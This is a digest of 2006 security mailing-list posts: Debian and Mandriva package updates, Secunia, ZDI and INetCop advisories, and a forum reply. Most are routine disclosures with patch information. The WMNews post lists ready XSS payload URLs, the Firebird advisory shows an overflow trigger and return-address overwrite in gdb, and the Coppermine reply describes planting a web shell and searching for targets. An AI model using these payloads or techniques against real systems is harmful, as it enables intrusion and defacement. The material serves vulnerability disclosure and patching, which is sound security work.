http://security.debian.org/pool/updates/main/g/gnupg/gnupg_1.4.1.orig.tar.gz Size/MD5 checksum: 4059170 1cc77c6943baaa711222e954bbd785e5 Alpha architecture: http://security.debian.org/pool/updates/main/g/gnupg/gnupg_1.4.1-1.sarge3_alpha.deb Size/MD5 checksum: 2155538 07b4643bf4cd05639a261fa0b3fa6a89 AMD64 architecture:
Secunia Research: unalz Filename Handling Directory Traversal Vulnerability
== Secunia Research 13/03/2006 - unalz Filename Handling Directory Traversal Vulnerability - == Table of Contents Affected Software1 Severity.2 Description of Vulnerability.3 Solution.4 Time Table...5 Credits..6 References...7 About Secunia8 Verification.9 == 1) Affected Software * unalz version 0.53. Other versions may also be affected. == 2) Severity Rating: Less Critical Impact: System access Where: Remote == 3) Description of Vulnerability Secunia Research has discovered a vulnerability in unalz, which potentially can be exploited by malicious people to compromise a user's system. The vulnerability is caused due to an input validation error when extracting an ALZ archive. This makes it possible to have files extracted to arbitrary locations outside the specified directory using the ../ directory traversal sequence. The vulnerability has been confirmed in version 0.53. Other version may also be affected. == 4) Solution Update to version 0.55. == 5) Time Table 02/03/2006 - Initial vendor notification. 10/03/2006 - Initial vendor reply. 13/03/2006 - Public disclosure. == 6) Credits Discovered by Tan Chew Keong, Secunia Research. == 7) References The Common Vulnerabilities and Exposures (CVE) project has assigned CVE-2006-0950 for the vulnerability. == 8) About Secunia Secunia collects, validates, assesses, and writes advisories regarding all the latest software vulnerabilities disclosed to the public. These advisories are gathered in a publicly available database at the Secunia website: http://secunia.com/ Secunia offers services to our customers enabling them to receive all relevant vulnerability information to their specific system configuration. Secunia offers a FREE mailing list called Secunia Security Advisories: http://secunia.com/secunia_security_advisories/ == 9) Verification Please verify this advisory by visiting the Secunia website: http://secunia.com/secunia_research/2006-16/advisory/ Complete list of vulnerability reports published by Secunia Research: http://secunia.com/secunia_research/ ==
WMNews Cross Site Scripting
- WMNews Cross Site Scripting Site:http://wartamikael.org/PHPScripts/ Demo:http://www.scriptevi.com/files/demo/news/wmnews/ --- Credit : R00T3RR0R webpage:www.biyosecurity.be Mail :[EMAIL PROTECTED] - WMNews http://victim/path/wmview.php?ArtCat=;scriptalert(/R00T3RR0R/)/script http://victim/path/footer.php?ctrrowcol=;scriptalert(/R00T3RR0R/)/script http://victim/path/wmcomments.php?act=viCmID=2ArtID=;scriptalert(/R00T3RR0R/)/script Source: http://www.blogcu.com/Liz0ziM/350164/ http://biyosecurity.be/bugs/wmnews.txt
Buffer Overflow and Installation Script Error in Firebird 1.5.3
Hi to all! In the latest Firebird release (1.5.3) various security problems has been fixed. Attached goes an advisory about 2 of these. --- Joxean Koret --- Buffer Overflow and Installation Script Error in Firebird 1.5.3 --- Author: Jose Antonio Coret (Joxean Koret) Date: 2005-02-18 Location: Basque Country --- Affected software description: ~~ Product: Firebird Vulnerable Version: 1.5.2.4731 Description: Firebird is a relational database offering many ANSI SQL-99 features that runs on Linux, Windows, and a variety of Unix platforms. Firebird offers excellent concurrency, high performance, and powerful language support for stored procedures and triggers. It has been used in production systems, under a variety of names since 1981. Web : http://firebird.sourceforge.net --- Vulnerability List: ~~~ A.- Install script makes fb_inet_server and fbserver suid firebird unnecesarily B.- Buffer overflow in suid firebird fb_inet_server and fbserver binaries Vulnerabilities: A.- Install script makes fb_inet_server and fbserver suid firebird unnecesarily - The installation script of Firebird 1.5.2 makes the binaries fb_inet_server and fbserver suid firebird but this is unnecesary. If you takes a look to the install script firebird1.5.2./scripts/postinstall.sh you will see the following lines: (...) # SUID is still needed for group direct access. General users # cannot run though. for i in fb_lock_mgr gds_drop fb_inet_server do if [ -f $i ] then chmod ug=rx,o= $i chmod ug+s $i fi done (...) but, as the author says the fb_inet_server (at least) doesn't need to be suid firebird. The following is a fragment of Alex Peshkov (a Firebird developer) response about this problem: They need not and should not be set*id. And in standard precompiled binaries fbserver is not setuid. But for unknown to me reasons fb_inet_server is made setuid 'firebird' by install script (Debian guys fixed it, I think). I've noticed it, unfortunately, after release of 1.5.2, but definitely will fix it in future releases. Except security vulnerability this brings additional problem when one wants to change fb_inet_server run-user - changing only xinetd.d entry is not enough. - Debian distributions are not vulnerable to this problem. As the Alex Peshkov says Debian people has been fixed it. B.- Buffer overflow in suid firebird fb_inet_server and fbserver binaries - The '-p' argument to the fb_inet_server and fbserver binaries is vulnerable to buffer overflows. If an string of more than 150 characters is passed to the '-p' parameter of any of these binaries the program will crash with a Segmentation Fault message. - The following is a test of the vulnerability: /usr/lib/firebird2/bin$ ls fb_lock_print fbguard fbmgr fbmgr.bin fbserver gsec /usr/lib/firebird2/bin$ ./fbserver -p `perl -e 'print ax155;'`1234 Segmentation fault The program dies abruptly. The bytes passeds from position 155 to 159 overwrites the return address: /usr/lib/firebird2/bin$ gdb ./fbserver GNU gdb 6.3 (...) (gdb) run -p `perl -e 'print ax155;'`4321 Starting program: /usr/lib/firebird2/bin/fbserver -p `perl -e 'print ax155;'`4321 (...) Program received signal SIGSEGV, Segmentation fault. [Switching to Thread -1210892160 (LWP 25358)] 0x31323334 in ?? () We have been overwrite the return address with the bytes 0x31 0x32 0x33 0x34, the numbers 4 3 2 1 in reverse order. (gdb) where #0 0x31323334 in ?? () #1 0x08233496 in ?? () #2 0x in ?? () #3 0xb9b0 in ?? () #4 0x6161 in ?? () #5 0x in ?? () #6 0x in ?? () #7 0x in ?? () #8 0x in ?? () #9 0x in ?? () #10 0xb9b0 in ?? () #11 0x in ?? () #12 0x in ?? () #13 0x in ?? () #14 0xbb04 in ?? () #15 0x0804e370 in ?? () #16 0x in ?? () #17 0xbd50 in ?? () #18 0x in ?? () #19 0x in ?? () #20 0x in ?? () #21 0x in ?? () #22 0x in ?? () Notes: ~~ - Various other problems, not discovered by me, has been fixed in the 1.5.3 version. I encourage to upgrade to the newest version as soon as possible. Patches for the
Re: Coppermine exploit used by a Chase Phish?
Coppermine is subjectable to multiple exploits, for the most part exploiters do not need to have much knowledge of it's working. There is a script called nst.php which is saved as a rar file and uploaded into the coppermine (unless coppermine is properly configured to now access anything bt image files) this nst.php script allows them to run a local acct on the system and browse through directories,upload new files even access sql u/p and the sql database. there is a good possablity this is what happened some kid hacked the coppermine using a script simular to the nst.php uploaded it, got into the sever, and simply uplaoded the phish script. pretty easy to do actually, and a simple google search for [subject],powered by coppermine will give a extended list of possible targets for the exploiter to attack. Paul Laudanski wrote: I got sent a Chase phish email tonight and in checking it out it appears to be live on a Coppermine gallery installation. Is this a new exploit of Coppermine, or just this site hasn't been yet patched? A photo of the phish site with the URL (domain blacked out): http://castlecops.com/p728141-Mar_10_Phish_Alerts.html#728141
[INetCop Security Advisory] zeroboard IP session bypass XSS vulnerability
INetCop Security Advisory #2006-0x82-029 * Title: zeroboard IP session bypass XSS vulnerability 0x01. Description Zeroboard is a popular web notice board used in Korea. INetCop Security found XSS vulnerability in the latest zeroboard version 4.1 pl 7 (2005. 4. 4). Basically, zeroboard uses the following algorithm so that session may not be abused by the attack related with cookie. (e.g: cookie spoofing, sniffing) After login, is part that handle session: -- bbs/login_check.php: ... 24 // 회원로그인이 성공하였을 경우 세션을 생성하고 페이지를 이동함 25 if($member_data[no]) { 26 27 if($auto_login) { 28 makeZBSessionID($member_data[no]); 29 } 30 31 // 4.0x 용 세션 처리 32 $zb_logged_no = $member_data[no]; 33 $zb_logged_time = time(); 34 $zb_logged_ip = $REMOTE_ADDR; --- Recording IP address 35 $zb_last_connect_check = '0'; 36 37 session_register(zb_logged_no); 38 session_register(zb_logged_time); 39 session_register(zb_logged_ip); 40 session_register(zb_last_connect_check); 41 -- If IP address is different from present session user's, connection terminates: -- bbs/lib.php: 94 // 세션 값을 체크하여 로그인을 처리 95 } elseif($HTTP_SESSION_VARS[zb_logged_no]) { 96 97 // 로그인 시간이 지정된 시간을 넘었거나 로그인 아이피가 현재 사용자의 아이피와 다를 경우 로그아웃 시킴 98 if(time()-$HTTP_SESSION_VARS[zb_logged_time] $_zbDefaultSetup[login_time]||$HTTP_SESSION_VARS[zb_logged_ip]!=$REMOTE_ADDR) { 99 100 $zb_logged_no=; // session initialization 101 $zb_logged_time=; 102 $zb_logged_ip=; 103 session_register(zb_logged_no); 104 session_register(zb_logged_ip); 105 session_register(zb_logged_time); 106 session_destroy(); 107 108 // 유효할 경우 로그인 시간을 다시 설정 109 } else { -- This seems to be intercepting cookie hacking. But, if we take advantage of IP session disablement technique, session bypassing may be possible. Detailed explanation about the way to exploit this vulnerability is found at the following reference. URL: http://x82.inetcop.org/h0me/papers/iframe_tag_exploit.txt (Korean) As a result, hacker through administrator's web browser exploit code workably become. -- 0x02. Vulnerable Packages Vendor site: http://www.nzeo.com/ Low versions including Zeroboard 4.1 pl 7 (2005. 4. 4) version. -zb41pl7.tar.Z Disclosure Timeline: 2003-04.??: Vulnerabilities found. 2006-02.17: 1st vendor contact. (didn't respond) 2006-02.22: 2nd vendor contact. (didn't respond) 2006-02.25: Vendor responded, patch released. 2006-03.12: Public disclosure. 0x03. Exploit We have 2 `Proof-of-Concept' exploit about this vulnerability. This XSS vulnerability happens in memo box title and user email, homepage information input. When administrator logins and checks a user information page, attack code can be achieved, and there is another way, which injects an attack code in memo title. After exploit, an attacker can inject PHP code through an administrator web page function. Through this PHP code injection, the attacker(normal user) can change the password of administrator, and take administrator's privilege To prevent the abuse of this vulnerabilty, INetCop Security will not publish POC code. 0x04. Patch INetCop Security released temporary patch: INetCop Security Patch URL: http://inetcop.net/upfiles/Zeroboard-4.1_pl7_patch.tgz And vendor's patch after INetCop Security advisory: Vendor Patch URL: http://www.nzeo.com/bbs/zboard.php?id=cgi_bugreport2no=5406 -- Thank you. P.S: I give thanks to Securityproof that suffer translation. Korean Advisory URL: http://www.inetcop.org/upfiles/33INCSA.2006-0x82-029-zeroboard.pdf -- By dong-houn yoU (Xpl017Elz), in INetCop(c) Security. MSN E-mail: szoahc(at)hotmail(dot)com, xploit(at)hackermail(dot)com INetCop Security Home: http://www.inetcop.org My World: http://x82.inetcop.org GPG public key: http://x82.inetcop.org/h0me/pr0file/x82.k3y -- -- ___ Get your free email from http://www.hackermail.com
[SECURITY] [DSA 997-1] New bomberclone packages fix arbitrary code execution
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 997-1 [EMAIL PROTECTED] http://www.debian.org/security/ Martin Schulze March 13th, 2006http://www.debian.org/security/faq - -- Package: bomberclone Vulnerability : buffer overflows Problem type : remote Debian-specific: no CVE ID : CVE-2006-0460 BugTraq ID : 16697 Stefan Cornelius of Gentoo Security discovered that bomberclone, a free Bomberman-like game, crashes when receiving overly long error packets, which may also allow remote attackers to execute arbitrary code. The old stable distribution (woody) does not contain bomberclone packages. For the stable distribution (sarge) these problems have been fixed in version 0.11.5-1sarge1. For the unstable distribution (sid) these problems have been fixed in version 0.11.6.2-1. We recommend that you upgrade your bomberclone package. Upgrade Instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge - Source archives: http://security.debian.org/pool/updates/main/b/bomberclone/bomberclone_0.11.5-1sarge1.dsc Size/MD5 checksum: 668 e59985e92646e66e09f0c904cc777e82 http://security.debian.org/pool/updates/main/b/bomberclone/bomberclone_0.11.5-1sarge1.diff.gz Size/MD5 checksum: 6985 a9d9696db932b11774b839d2b765fd31 http://security.debian.org/pool/updates/main/b/bomberclone/bomberclone_0.11.5.orig.tar.gz Size/MD5 checksum: 7985803 cd2834d68980dd506038db44728cd2b1 Architecture independent components: http://security.debian.org/pool/updates/main/b/bomberclone/bomberclone-data_0.11.5-1sarge1_all.deb Size/MD5 checksum: 7586908 c869506540ddfc25d3c452f32350d4ff Alpha architecture: http://security.debian.org/pool/updates/main/b/bomberclone/bomberclone_0.11.5-1sarge1_alpha.deb Size/MD5 checksum: 128338 d97db6f509a94124fab9e20cdcabb2a4 AMD64 architecture: http://security.debian.org/pool/updates/main/b/bomberclone/bomberclone_0.11.5-1sarge1_amd64.deb Size/MD5 checksum: 114644 827f5f7850204fd2166a34258f17a71d ARM architecture: http://security.debian.org/pool/updates/main/b/bomberclone/bomberclone_0.11.5-1sarge1_arm.deb Size/MD5 checksum: 117114 3e0cf308c1cb3a93a032eddfb7331f9c Intel IA-32 architecture: http://security.debian.org/pool/updates/main/b/bomberclone/bomberclone_0.11.5-1sarge1_i386.deb Size/MD5 checksum:95614 626662760c83f79e2119e7e896970d4f Intel IA-64 architecture: http://security.debian.org/pool/updates/main/b/bomberclone/bomberclone_0.11.5-1sarge1_ia64.deb Size/MD5 checksum: 171882 ed2ef72266943a1cc789f3b6f0ba7358 HP Precision architecture: http://security.debian.org/pool/updates/main/b/bomberclone/bomberclone_0.11.5-1sarge1_hppa.deb Size/MD5 checksum: 107690 383b107de7545ced60bb5afa38b4ed92 Motorola 680x0 architecture: http://security.debian.org/pool/updates/main/b/bomberclone/bomberclone_0.11.5-1sarge1_m68k.deb Size/MD5 checksum:94488 32dc2741532866a837e1a6c8d7909b06 Big endian MIPS architecture: http://security.debian.org/pool/updates/main/b/bomberclone/bomberclone_0.11.5-1sarge1_mips.deb Size/MD5 checksum: 116202 e8c5cb65dfcfd70ffe8b6320188a6728 Little endian MIPS architecture: http://security.debian.org/pool/updates/main/b/bomberclone/bomberclone_0.11.5-1sarge1_mipsel.deb Size/MD5 checksum: 116026 29263ffcbf426c911e0b3d8a034a9b92 PowerPC architecture: http://security.debian.org/pool/updates/main/b/bomberclone/bomberclone_0.11.5-1sarge1_powerpc.deb Size/MD5 checksum: 101888 0813f5ce3091cb8b7d482221c6b0a98f IBM S/390 architecture: http://security.debian.org/pool/updates/main/b/bomberclone/bomberclone_0.11.5-1sarge1_s390.deb Size/MD5 checksum: 113050 b5298b8a579f76f1fd0751a64f2835d3 Sun Sparc architecture: http://security.debian.org/pool/updates/main/b/bomberclone/bomberclone_0.11.5-1sarge1_sparc.deb Size/MD5 checksum: 102884 72313829a57423a10dd1d200775c9f0d These files will probably be moved into the stable distribution on its next update. - - For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp:
[ MDKSA-2006:055 ] - Updated gnupg packages fix signature file verification vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2006:055 http://www.mandriva.com/security/ ___ Package : gnupg Date: March 13, 2006 Affected: 10.2, 2006.0, Corporate 3.0, Multi Network Firewall 2.0 ___ Problem Description: Another vulnerability, different from that fixed in MDKSA-2006:043 (CVE-2006-0455), was discovered in gnupg in the handling of signature files. This vulnerability is corrected in gnupg 1.4.2.2 which is being provided with this update. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0049 ___ Updated Packages: Mandriva Linux 10.2: 78bc5edadc4c09cc79301e92e769792b 10.2/RPMS/gnupg-1.4.2.2-0.1.102mdk.i586.rpm a64138f15d9d24c9fd342a9d58739629 10.2/SRPMS/gnupg-1.4.2.2-0.1.102mdk.src.rpm Mandriva Linux 10.2/X86_64: 921557b980e6831d91f67c1be03ff221 x86_64/10.2/RPMS/gnupg-1.4.2.2-0.1.102mdk.x86_64.rpm a64138f15d9d24c9fd342a9d58739629 x86_64/10.2/SRPMS/gnupg-1.4.2.2-0.1.102mdk.src.rpm Mandriva Linux 2006.0: ff09cfa3b8f71b9e5ddf4a7639696b9d 2006.0/RPMS/gnupg-1.4.2.2-0.1.20060mdk.i586.rpm 22b6b9305f47570652dc276cf8f18401 2006.0/SRPMS/gnupg-1.4.2.2-0.1.20060mdk.src.rpm Mandriva Linux 2006.0/X86_64: 388c4bca33be3cccb9a44e87b1a34964 x86_64/2006.0/RPMS/gnupg-1.4.2.2-0.1.20060mdk.x86_64.rpm 22b6b9305f47570652dc276cf8f18401 x86_64/2006.0/SRPMS/gnupg-1.4.2.2-0.1.20060mdk.src.rpm Corporate 3.0: cd7fbec4de29eabcc31fdeb90e05f674 corporate/3.0/RPMS/gnupg-1.4.2.2-0.1.C30mdk.i586.rpm 54fa6da091d1124b661a9fbc4f21abe1 corporate/3.0/SRPMS/gnupg-1.4.2.2-0.1.C30mdk.src.rpm Corporate 3.0/X86_64: f43a3a505f7874324542f16398243786 x86_64/corporate/3.0/RPMS/gnupg-1.4.2.2-0.1.C30mdk.x86_64.rpm 54fa6da091d1124b661a9fbc4f21abe1 x86_64/corporate/3.0/SRPMS/gnupg-1.4.2.2-0.1.C30mdk.src.rpm Multi Network Firewall 2.0: 3a998c3c9451bba3ac118df3a8b74955 mnf/2.0/RPMS/gnupg-1.4.2.2-0.1.M20mdk.i586.rpm 18cfe29d05e64e08c77bab8683517798 mnf/2.0/SRPMS/gnupg-1.4.2.2-0.1.M20mdk.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.4 (GNU/Linux) iD8DBQFEFcoumqjQ0CJFipgRAo0CAKCTHjbpAjG4GONKzPzHGja45wyVAgCgyApo 91TxmG2szENod45PnFctWyg= =5TQS -END PGP SIGNATURE-
ZDI-06-003: Ipswitch Collaboration Suite Code Execution Vulnerability
ZDI-06-003: Ipswitch Collaboration Suite Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-06-003.html March 13, 2006 -- CVE ID: CVE-2005-3526 -- Affected Vendor: Ipswitch -- Affected Products: Ipswitch Collaboration Suite 2006.02 and below -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability since December 13, 2005 by Digital Vaccine protection filter ID 3982. For further product information on the TippingPoint IPS: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Ipswitch Collaboration Suite. Authentication is required to exploit this vulnerability. This specific flaw exists within the IMAP daemon. A lack of bounds checking during the parsing of long arguments to the FETCH verb can result in an exploitable buffer overflow. -- Vendor Response: From http://www.ipswitch.com/support/ics/updates/ics200603prem.asp: IMAP: Corrected a vulnerability issue where a properly crafted Fetch command causes IMAP to crash with a buffer overflow (disclosed by TippingPoint, a division of 3Com). -- Disclosure Timeline: 2005.12.13 - Vulnerability reported to vendor 2005.12.13 - Digital Vaccine released to TippingPoint customers 2006.03.13 - Public release of advisory -- Credit: This vulnerability was discovered by Manuel Santamarina Suarez aka 'FistFuXXer'. -- About the Zero Day Initiative (ZDI): Established by TippingPoint, a division of 3Com, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. 3Com does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, 3Com provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, 3Com provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product.